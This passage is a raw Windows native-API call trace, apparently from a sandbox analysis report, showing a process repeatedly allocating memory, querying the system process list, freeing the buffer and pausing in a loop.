RegionSize=0xdea54*=0x20000) returned 0x0 [0279.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.047] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.057] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.107] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.129] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.138] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.179] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.188] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.220] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.233] 